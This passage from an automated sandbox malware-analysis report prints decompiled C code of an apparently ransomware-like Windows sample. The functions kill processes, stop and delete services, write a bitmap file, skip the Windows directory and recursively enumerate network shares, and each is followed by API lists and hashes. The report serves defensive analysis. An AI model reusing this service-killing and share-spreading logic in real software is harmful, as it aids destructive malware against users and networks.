					_push( &_v6796);
					_push( &_v12);
					_push( &_v20);
					_push( *0x9d0f7c);
					if( *0x9d10dc() != 0) {
						L21:
						 *0x9d1178( *0x9d0f7c);
						CloseServiceHandle( *0x9d1d80);
						_t26 = 1;
						L23:
						return _t26;
					}
					_t57 = 0;
					_v8 = 0;
					if(_v12 <= 0) {
						goto L21;
					}
					_t73 =  &_v6796;
					do {
						_t41 = _t73[0xa3];
						if(_t41 != 3) {
							__eflags =  *_t73 - 4;
							if( *_t73 == 4) {
								goto L20;
							}
							__eflags = _t41 - 0x3e8;
							if(_t41 == 0x3e8) {
								goto L20;
							}
							L16:
							_t42 = E009C4964( *_t73);
							_pop(0);
							__eflags = _t42;
							if(_t42 != 0) {
								goto L20;
							}
							_t68 = OpenProcess(1, _t66,  *_t73);
							__eflags = _t68;
							if(_t68 != 0) {
								TerminateProcess(_t68, 0);
								E009C4B21(_t68);
								_pop(0);
							}
							L19:
							E009C4917(0,  *_t73);
							_t57 = _v8;
							goto L20;
						}
						_t58 = OpenServiceW( *0x9d1d80,  &(_t73[0x83]), 0x10020);
						if(_t58 == 0) {
							goto L21;
						}
						_t61 = 6;
						_v48 = _t66;
						memset( &_v44, 0, _t61 << 2);
						_t75 = _t75 + 0xc;
						if(ControlService(_t58, 1,  &_v48) == 0) {
							_t57 = _v8;
							_t66 = 0;
							__eflags = 0;
							goto L16;
						}
						if(DeleteService(_t58) == 0) {
							goto L21;
						}
						CloseServiceHandle(_t58);
						goto L19;
						L20:
						_t57 = _t57 + 1;
						_t73 =  &(_t73[0xa7]);
						_v8 = _t57;
						_t66 = 0;
					} while (_t57 < _v12);
					goto L21;
				}
			}























                                                                                                                                                            0x009c5a29
                                                                                                                                                            0x009c5a31
                                                                                                                                                            0x009c5a38
                                                                                                                                                            0x009c5a3d
                                                                                                                                                            0x009c5a40
                                                                                                                                                            0x009c5a4a
                                                                                                                                                            0x009c5a4d
                                                                                                                                                            0x009c5bcc
                                                                                                                                                            0x009c5bcc
                                                                                                                                                            0x009c5bcc
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c5a60
                                                                                                                                                            0x009c5a6e
                                                                                                                                                            0x009c5a76
                                                                                                                                                            0x009c5a77
                                                                                                                                                            0x009c5a78
                                                                                                                                                            0x009c5a85
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c5a8b
                                                                                                                                                            0x009c5a8c
                                                                                                                                                            0x009c5a8d
                                                                                                                                                            0x009c5a8e
                                                                                                                                                            0x009c5a92
                                                                                                                                                            0x009c5a93
                                                                                                                                                            0x009c5a95
                                                                                                                                                            0x009c5aa3
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c5aae
                                                                                                                                                            0x009c5ab5
                                                                                                                                                            0x009c5abc
                                                                                                                                                            0x009c5ac0
                                                                                                                                                            0x009c5ac4
                                                                                                                                                            0x009c5ac5
                                                                                                                                                            0x009c5ad3
                                                                                                                                                            0x009c5bad
                                                                                                                                                            0x009c5bb3
                                                                                                                                                            0x009c5bbf
                                                                                                                                                            0x009c5bc8
                                                                                                                                                            0x009c5bce
                                                                                                                                                            0x009c5bd2
                                                                                                                                                            0x009c5bd2
                                                                                                                                                            0x009c5ad9
                                                                                                                                                            0x009c5adb
                                                                                                                                                            0x009c5ae1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c5ae7
                                                                                                                                                            0x009c5aed
                                                                                                                                                            0x009c5aed
                                                                                                                                                            0x009c5af6
                                                                                                                                                            0x009c5b4c
                                                                                                                                                            0x009c5b4f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c5b51
                                                                                                                                                            0x009c5b56
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c5b5f
                                                                                                                                                            0x009c5b61
                                                                                                                                                            0x009c5b66
                                                                                                                                                            0x009c5b67
                                                                                                                                                            0x009c5b69
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c5b76
                                                                                                                                                            0x009c5b78
                                                                                                                                                            0x009c5b7a
                                                                                                                                                            0x009c5b7f
                                                                                                                                                            0x009c5b86
                                                                                                                                                            0x009c5b8b
                                                                                                                                                            0x009c5b8b
                                                                                                                                                            0x009c5b8c
                                                                                                                                                            0x009c5b8e
                                                                                                                                                            0x009c5b93
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c5b96
                                                                                                                                                            0x009c5b10
                                                                                                                                                            0x009c5b14
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c5b1c
                                                                                                                                                            0x009c5b1d
                                                                                                                                                            0x009c5b25
                                                                                                                                                            0x009c5b25
                                                                                                                                                            0x009c5b36
                                                                                                                                                            0x009c5b5a
                                                                                                                                                            0x009c5b5d
                                                                                                                                                            0x009c5b5d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c5b5d
                                                                                                                                                            0x009c5b41
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c5b44
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c5b97
                                                                                                                                                            0x009c5b97
                                                                                                                                                            0x009c5b98
                                                                                                                                                            0x009c5ba0
                                                                                                                                                            0x009c5ba3
                                                                                                                                                            0x009c5ba4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c5aed

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 009C5C11: VerSetConditionMask.KERNEL32(00000000,00000000,00000080,00000001,?,00000000,?), ref: 009C5C6B
                                                                                                                                                              • Part of subcall function 009C5C11: VerifyVersionInfoW.KERNEL32(0000011C,00000080,00000000), ref: 009C5C7B
                                                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000004,?,009C3071,?), ref: 009C5A68
                                                                                                                                                            • OpenServiceW.ADVAPI32(?,00010020), ref: 009C5B0A
                                                                                                                                                            • ControlService.ADVAPI32(00000000,00000001,?), ref: 009C5B2E
                                                                                                                                                            • DeleteService.ADVAPI32(00000000), ref: 009C5B39
                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 009C5B44
                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009C5B70
                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 009C5B7F
                                                                                                                                                            • CloseServiceHandle.ADVAPI32 ref: 009C5BBF
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Service$Open$CloseHandleProcess$ConditionControlDeleteInfoManagerMaskTerminateVerifyVersion
                                                                                                                                                            • String ID: ServicesActive
                                                                                                                                                            • API String ID: 3848605446-3071072050
                                                                                                                                                            • Opcode ID: 2c69a9c2e9484eb6798d2e1feed28c75b27ae8a6f1cfe7abebd7041b0cab6d13
                                                                                                                                                            • Instruction ID: a6a2b702236ca8e8f6f6dee1fa5eafb42742a2f6aa8e0515c63e98b17b31d443
                                                                                                                                                            • Opcode Fuzzy Hash: 2c69a9c2e9484eb6798d2e1feed28c75b27ae8a6f1cfe7abebd7041b0cab6d13
                                                                                                                                                            • Instruction Fuzzy Hash: F4419376A55605BBDB20ABA5DC44FAF7BBDEB95700F11002FF601E2151DB31ADC0DA22
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C4284, Relevance: 13.7, APIs: 9, Instructions: 170filememoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                            			E009C4284(signed int __edx, void* _a4, struct HDC__* _a8, WCHAR* _a12) {
				long _v8;
				intOrPtr _v14;
				intOrPtr _v18;
				intOrPtr _v22;
				void _v24;
				signed int _v30;
				signed int _v32;
				signed short _v40;
				intOrPtr _v44;
				char _v48;
				int _t45;
				signed int _t48;
				void* _t57;
				long _t63;
				void* _t64;
				int _t80;
				int _t83;
				void* _t84;
				signed int _t96;
				void* _t104;
				int _t106;
				void* _t107;

				_t96 = __edx;
				_push( &_v48);
				_t106 = 0x18;
				_t45 = GetObjectW(_a4, _t106, ??);
				if(_t45 != 0) {
					_t48 = _v30 * _v32 & 0x0000ffff;
					if(_t48 != 1) {
						_t83 = 4;
						if(_t48 <= _t83) {
							L9:
							_push(0x28 + (1 << _t83) * 4);
							L10:
							_t107 = LocalAlloc(0x40, ??);
							 *_t107 = 0x28;
							 *((intOrPtr*)(_t107 + 4)) = _v44;
							 *(_t107 + 8) = _v40;
							 *((short*)(_t107 + 0xc)) = _v32;
							 *((short*)(_t107 + 0xe)) = _v30;
							_t57 = 0x18;
							if(_t83 < _t57) {
								 *(_t107 + 0x20) = 1 << _t83;
							}
							asm("cdq");
							 *((intOrPtr*)(_t107 + 0x10)) = 0;
							 *((intOrPtr*)(_t107 + 0x24)) = 0;
							_t63 = ( *((intOrPtr*)(_t107 + 4)) + 7 + (_t96 & 0x00000007) >> 3) * (_t83 & 0x0000ffff) *  *(_t107 + 8);
							 *(_t107 + 0x14) = _t63;
							_t64 = GlobalAlloc(0, _t63);
							_t84 = _t64;
							if(_t84 == 0) {
								L21:
								return _t64;
							} else {
								_t64 = GetDIBits(_a8, _a4, 0,  *(_t107 + 8) & 0x0000ffff, _t84, _t107, 0);
								if(_t64 == 0) {
									goto L21;
								}
								_t64 = CreateFileW(_a12, 0xc0000000, 0, 0, 2, 0x80, 0);
								_t104 = _t64;
								if(_t104 == 0xffffffff) {
									goto L21;
								}
								_v24 = 0x4d42;
								_v22 =  *_t107 +  *(_t107 + 0x14) +  *(_t107 + 0x20) * 4 + 0xe;
								_v18 = 0;
								_v14 =  *_t107 +  *(_t107 + 0x20) * 4 + 0xe;
								if(WriteFile(_t104,  &_v24, 0xe,  &_v8, 0) == 0 || WriteFile(_t104, _t107, 0x28 +  *(_t107 + 0x20) * 4,  &_v8, 0) == 0) {
									_push(_t104);
									goto L19;
								} else {
									_t80 = WriteFile(_t104, _t84,  *(_t107 + 0x14),  &_v8, 0);
									_push(_t104);
									if(_t80 != 0) {
										E009C4B21();
										_t64 = GlobalFree(_t84);
										goto L21;
									}
									L19:
									_t64 = E009C4B21();
									goto L21;
								}
							}
						}
						_t83 = 8;
						if(_t48 <= _t83) {
							goto L9;
						}
						_t83 = 0x10;
						if(_t48 <= _t83) {
							goto L9;
						}
						if(_t48 > _t106) {
							_t83 = 0x20;
							goto L9;
						}
						_t83 = _t106;
						_push(0x28);
						goto L10;
					}
					_t83 = 1;
					goto L9;
				}
				return _t45;
			}

























                                                                                                                                                            0x009c4284
                                                                                                                                                            0x009c428e
                                                                                                                                                            0x009c4291
                                                                                                                                                            0x009c4296
                                                                                                                                                            0x009c429e
                                                                                                                                                            0x009c42b0
                                                                                                                                                            0x009c42b6
                                                                                                                                                            0x009c42be
                                                                                                                                                            0x009c42c2
                                                                                                                                                            0x009c42e2
                                                                                                                                                            0x009c42ef
                                                                                                                                                            0x009c42f0
                                                                                                                                                            0x009c42f8
                                                                                                                                                            0x009c42fc
                                                                                                                                                            0x009c4305
                                                                                                                                                            0x009c430b
                                                                                                                                                            0x009c4312
                                                                                                                                                            0x009c431a
                                                                                                                                                            0x009c431e
                                                                                                                                                            0x009c4322
                                                                                                                                                            0x009c4328
                                                                                                                                                            0x009c4328
                                                                                                                                                            0x009c4336
                                                                                                                                                            0x009c433a
                                                                                                                                                            0x009c433f
                                                                                                                                                            0x009c4348
                                                                                                                                                            0x009c434e
                                                                                                                                                            0x009c4351
                                                                                                                                                            0x009c4357
                                                                                                                                                            0x009c435b
                                                                                                                                                            0x009c4432
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c4361
                                                                                                                                                            0x009c4370
                                                                                                                                                            0x009c4378
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c4390
                                                                                                                                                            0x009c4396
                                                                                                                                                            0x009c439b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c43a6
                                                                                                                                                            0x009c43bc
                                                                                                                                                            0x009c43c1
                                                                                                                                                            0x009c43cf
                                                                                                                                                            0x009c43e5
                                                                                                                                                            0x009c4404
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c4407
                                                                                                                                                            0x009c4412
                                                                                                                                                            0x009c4418
                                                                                                                                                            0x009c441b
                                                                                                                                                            0x009c4425
                                                                                                                                                            0x009c442c
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c442c
                                                                                                                                                            0x009c441d
                                                                                                                                                            0x009c441d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c4422
                                                                                                                                                            0x009c43e5
                                                                                                                                                            0x009c435b
                                                                                                                                                            0x009c42c6
                                                                                                                                                            0x009c42ca
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c42ce
                                                                                                                                                            0x009c42d2
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c42d7
                                                                                                                                                            0x009c42e1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c42e1
                                                                                                                                                            0x009c42d9
                                                                                                                                                            0x009c42db
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c42db
                                                                                                                                                            0x009c42b8
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c42b8
                                                                                                                                                            0x009c4438

                                                                                                                                                            APIs
                                                                                                                                                            • GetObjectW.GDI32(00000000,00000018,?,00000000,?,?,?,?,?,?,009C470E,?,00000000,00000000), ref: 009C4296
                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,00000000,?,?,?,?,?,?,009C470E,?,00000000,00000000), ref: 009C42F2
                                                                                                                                                            • GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,009C470E,?,00000000,00000000), ref: 009C4351
                                                                                                                                                            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 009C4370
                                                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,009C470E,?,00000000), ref: 009C4390
                                                                                                                                                            • WriteFile.KERNEL32(00000000,009C470E,0000000E,?,00000000,?,?,?,?,?,?,009C470E,?,00000000,00000000), ref: 009C43DD
                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,009C470E,?,00000000,00000000), ref: 009C43FA
                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,009C470E,?,00000000,00000000), ref: 009C4412
                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 009C442C
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: File$Write$AllocGlobal$BitsCreateFreeLocalObject
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 351847640-0
                                                                                                                                                            • Opcode ID: 61a66eb70b68895af1a9080f5b3778b0bc256bc7c19125e5c6b1ce506ff45900
                                                                                                                                                            • Instruction ID: 7a4d2ec65c9ea3d52c6c1e225e6be490e70e389c8b36de1bf33ec1006ac91c01
                                                                                                                                                            • Opcode Fuzzy Hash: 61a66eb70b68895af1a9080f5b3778b0bc256bc7c19125e5c6b1ce506ff45900
                                                                                                                                                            • Instruction Fuzzy Hash: 9251E076A00205ABE7209FA5DC95FABB7FCEF48710F50841EFA96C7290D7309941DB21
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C2D63, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                            			E009C2D63(intOrPtr _a4, intOrPtr _a8) {
				short _v6;
				char _v12;
				short _v14;
				char _v40;
				short _v42;
				char _v80;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				WCHAR* _t53;

				if( *0x9d22ac != 0) {
					return 1;
				}
				_t66 = _a8;
				if(_a8 != 0) {
					E009C6097(_a4);
					E009C6097(_t66);
					if( *0x9d1d18 != 0) {
						L9:
						E009C5DE2(0x9d0270, 0xba5, 0x10, 0x1a,  &_v40);
						_v14 = 0;
						E009C5DE2(0x9d0270, 0x88f, 0xb, 0x26,  &_v80);
						_v42 = 0;
						if(E009C6146(_t66,  &_v40) == 0 || E009C6146(_t66,  &_v80) == 0) {
							_t29 = 1;
						} else {
							if(E009C62B6(_a4,  &_v40) == 0) {
								_t34 = E009C64BF(0x9d2234, _t66);
								asm("sbb eax, eax");
								_t29 =  ~_t34 + 1;
							} else {
								E009C5DE2(0x9d0270, 0x5e6, 0xc, 6,  &_v12);
								_v6 = 0;
								_t40 = E009C62B6(_a4,  &_v12);
								asm("sbb eax, eax");
								_t29 =  ~( ~_t40);
							}
						}
						L15:
						L16:
						return _t29;
					}
					_t53 = L"\\\\?\\c:\\windows\\";
					if( *0x9d1d1c == 0) {
						GetWindowsDirectoryW(lstrlenW(_t53) * 2 + L"\\\\?\\c:\\windows\\", 0x104);
						PathAddBackslashW(_t53);
						E009C6097(_t53);
						 *0x9d1d1c = 1;
					}
					_t29 = E009C6146(_t53, _a4);
					if(_t29 != 0) {
						goto L9;
					} else {
						 *0x9d1d18 = 1;
						goto L15;
					}
				}
				_t29 = 1;
				goto L16;
			}













                                                                                                                                                            0x009c2d70
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c2d74
                                                                                                                                                            0x009c2d7b
                                                                                                                                                            0x009c2d80
                                                                                                                                                            0x009c2d8e
                                                                                                                                                            0x009c2d94
                                                                                                                                                            0x009c2da2
                                                                                                                                                            0x009c2e02
                                                                                                                                                            0x009c2e15
                                                                                                                                                            0x009c2e1c
                                                                                                                                                            0x009c2e2e
                                                                                                                                                            0x009c2e35
                                                                                                                                                            0x009c2e48
                                                                                                                                                            0x009c2eb2
                                                                                                                                                            0x009c2e5a
                                                                                                                                                            0x009c2e6a
                                                                                                                                                            0x009c2ea2
                                                                                                                                                            0x009c2eaa
                                                                                                                                                            0x009c2ead
                                                                                                                                                            0x009c2e6c
                                                                                                                                                            0x009c2e7a
                                                                                                                                                            0x009c2e81
                                                                                                                                                            0x009c2e8c
                                                                                                                                                            0x009c2e96
                                                                                                                                                            0x009c2e98
                                                                                                                                                            0x009c2e98
                                                                                                                                                            0x009c2e6a
                                                                                                                                                            0x009c2eb3
                                                                                                                                                            0x009c2eb4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c2eb4
                                                                                                                                                            0x009c2dab
                                                                                                                                                            0x009c2db0
                                                                                                                                                            0x009c2dc6
                                                                                                                                                            0x009c2dcd
                                                                                                                                                            0x009c2dd4
                                                                                                                                                            0x009c2dda
                                                                                                                                                            0x009c2dda
                                                                                                                                                            0x009c2de8
                                                                                                                                                            0x009c2df1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c2df3
                                                                                                                                                            0x009c2df3
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c2df3
                                                                                                                                                            0x009c2df1
                                                                                                                                                            0x009c2d84
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: \\?\c:\windows\
                                                                                                                                                            • API String ID: 0-2558258126
                                                                                                                                                            • Opcode ID: a50a3407036874e4b3feb5b88faf9c68953ac22c8e6358bdb39f75b5af2a1847
                                                                                                                                                            • Instruction ID: 921e7c9f1ad25a4b5b00593cb122988b571a99f6c4525246c44360e6c24521a6
                                                                                                                                                            • Opcode Fuzzy Hash: a50a3407036874e4b3feb5b88faf9c68953ac22c8e6358bdb39f75b5af2a1847
                                                                                                                                                            • Instruction Fuzzy Hash: 3E310572D58308BAEB24EB70DC42FAE37ACDF45344F10442AF902F61C1EB74998087A6
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C7A1F, Relevance: 6.1, APIs: 4, Instructions: 127shareCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                            			E009C7A1F(int _a4, int _a8, struct _NETRESOURCE* _a12) {
				struct _NETRESOURCE* _v8;
				int _v12;
				void* _v16;
				int _v20;
				struct _NETRESOURCE* _v24;
				short _v26;
				char _v40;
				struct _NETRESOURCE* _t41;
				signed int _t43;
				struct _NETRESOURCE* _t45;
				struct _NETRESOURCE* _t60;
				void* _t64;
				struct _NETRESOURCE* _t71;
				struct _NETRESOURCE* _t72;
				struct _NETRESOURCE** _t74;
				void* _t76;

				_t71 = _a12;
				if(WNetOpenEnumW(_a8, 0, 0, _t71,  &_v16) == 0) {
					_v12 = _v12 | 0xffffffff;
					_v20 = 0x4000;
					_t64 = E009C47AB(0x4000);
					__eflags = _t64;
					if(_t64 != 0) {
						goto L5;
						do {
							while(1) {
								L5:
								_t41 = WNetEnumResourceW(_v16,  &_v12, _t64,  &_v20);
								_v24 = _t41;
								__eflags = _t41;
								if(_t41 != 0) {
									goto L21;
								}
								_v8 = _t41;
								__eflags = _v12 - _t41;
								if(_v12 <= _t41) {
									continue;
								}
								_t14 = _t64 + 0x14; // 0x14
								_t74 = _t14;
								do {
									__eflags =  *(_t74 - 8) & 0x00000002;
									if(( *(_t74 - 8) & 0x00000002) == 0) {
										goto L15;
									}
									__eflags = _t71;
									if(_t71 == 0) {
										L13:
										_t20 = _t74 - 0x14; // 0x0
										E009C7A1F(_a4, _a8, _t20);
										_t76 = _t76 + 0xc;
										L14:
										_t41 = _v8;
										goto L15;
									}
									__eflags =  *(_t71 + 0x14);
									if( *(_t71 + 0x14) == 0) {
										goto L15;
									}
									__eflags =  *_t74;
									if( *_t74 == 0) {
										goto L15;
									}
									_t60 = E009C6146( *(_t71 + 0x14),  *_t74);
									__eflags = _t60;
									if(_t60 == 0) {
										goto L14;
									}
									goto L13;
									L15:
									__eflags =  *((intOrPtr*)(_t74 - 0x10)) - 1;
									if( *((intOrPtr*)(_t74 - 0x10)) == 1) {
										_t72 = E009C47AB(0xfffe);
										__eflags = _t72;
										if(_t72 != 0) {
											E009C5DE2(0x9d12d0, 0x4f, 0xf, 0xe,  &_v40);
											_v26 = 0;
											E009C61A7(_t72,  &_v40);
											E009C60C5(__eflags, _t72,  *_t74 + 2);
											E009C60C5(__eflags, _t72, 0x9cd2ec);
											 *0x9d1d00 =  *0x9d1d00 & 0x00000000;
											__eflags =  *0x9d1d00;
											E009C761A(_t72, _a4);
											E009C47F8(_t72);
											_t76 = _t76 + 0x38;
										}
										_t71 = _a12;
										_t41 = _v8;
									}
									_t41 = _t41 + 1;
									_t74 =  &(_t74[8]);
									_v8 = _t41;
									__eflags = _t41 - _v12;
								} while (_t41 < _v12);
								_t41 = _v24;
								goto L21;
							}
							L21:
							__eflags = _t41 - 0x103;
						} while (_t41 != 0x103);
						E009C47F8(_t64);
						_t43 = WNetCloseEnum(_v16);
						asm("sbb eax, eax");
						_t45 =  ~_t43 + 1;
						__eflags = _t45;
						L23:
						return _t45;
					}
					WNetCloseEnum(_v16);
					_t45 = 0;
					goto L23;
				}
				return 0;
			}



















                                                                                                                                                            0x009c7a29
                                                                                                                                                            0x009c7a3d
                                                                                                                                                            0x009c7a46
                                                                                                                                                            0x009c7a51
                                                                                                                                                            0x009c7a59
                                                                                                                                                            0x009c7a5c
                                                                                                                                                            0x009c7a5e
                                                                                                                                                            0x009c7a70
                                                                                                                                                            0x009c7a71
                                                                                                                                                            0x009c7a71
                                                                                                                                                            0x009c7a71
                                                                                                                                                            0x009c7a7d
                                                                                                                                                            0x009c7a83
                                                                                                                                                            0x009c7a86
                                                                                                                                                            0x009c7a88
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c7a8e
                                                                                                                                                            0x009c7a91
                                                                                                                                                            0x009c7a94
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c7a96
                                                                                                                                                            0x009c7a96
                                                                                                                                                            0x009c7a99
                                                                                                                                                            0x009c7a99
                                                                                                                                                            0x009c7a9d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c7a9f
                                                                                                                                                            0x009c7aa1
                                                                                                                                                            0x009c7abe
                                                                                                                                                            0x009c7abe
                                                                                                                                                            0x009c7ac8
                                                                                                                                                            0x009c7acd
                                                                                                                                                            0x009c7ad0
                                                                                                                                                            0x009c7ad0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c7ad0
                                                                                                                                                            0x009c7aa3
                                                                                                                                                            0x009c7aa7
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c7aa9
                                                                                                                                                            0x009c7aac
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c7ab3
                                                                                                                                                            0x009c7aba
                                                                                                                                                            0x009c7abc
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c7ad3
                                                                                                                                                            0x009c7ad3
                                                                                                                                                            0x009c7ad7
                                                                                                                                                            0x009c7ae3
                                                                                                                                                            0x009c7ae6
                                                                                                                                                            0x009c7ae8
                                                                                                                                                            0x009c7af9
                                                                                                                                                            0x009c7b00
                                                                                                                                                            0x009c7b09
                                                                                                                                                            0x009c7b15
                                                                                                                                                            0x009c7b20
                                                                                                                                                            0x009c7b28
                                                                                                                                                            0x009c7b28
                                                                                                                                                            0x009c7b30
                                                                                                                                                            0x009c7b36
                                                                                                                                                            0x009c7b3b
                                                                                                                                                            0x009c7b3b
                                                                                                                                                            0x009c7b3e
                                                                                                                                                            0x009c7b41
                                                                                                                                                            0x009c7b41
                                                                                                                                                            0x009c7b44
                                                                                                                                                            0x009c7b45
                                                                                                                                                            0x009c7b48
                                                                                                                                                            0x009c7b4b
                                                                                                                                                            0x009c7b4b
                                                                                                                                                            0x009c7b54
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c7b54
                                                                                                                                                            0x009c7b57
                                                                                                                                                            0x009c7b57
                                                                                                                                                            0x009c7b57
                                                                                                                                                            0x009c7b63
                                                                                                                                                            0x009c7b6c
                                                                                                                                                            0x009c7b75
                                                                                                                                                            0x009c7b77
                                                                                                                                                            0x009c7b77
                                                                                                                                                            0x009c7b78
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c7b78
                                                                                                                                                            0x009c7a63
                                                                                                                                                            0x009c7a69
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c7a69
                                                                                                                                                            0x00000000

                                                                                                                                                            APIs
                                                                                                                                                            • WNetOpenEnumW.MPR(00000001,00000000,00000000,?,00000001), ref: 009C7A35
                                                                                                                                                            • WNetCloseEnum.MPR(00000001), ref: 009C7A63
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
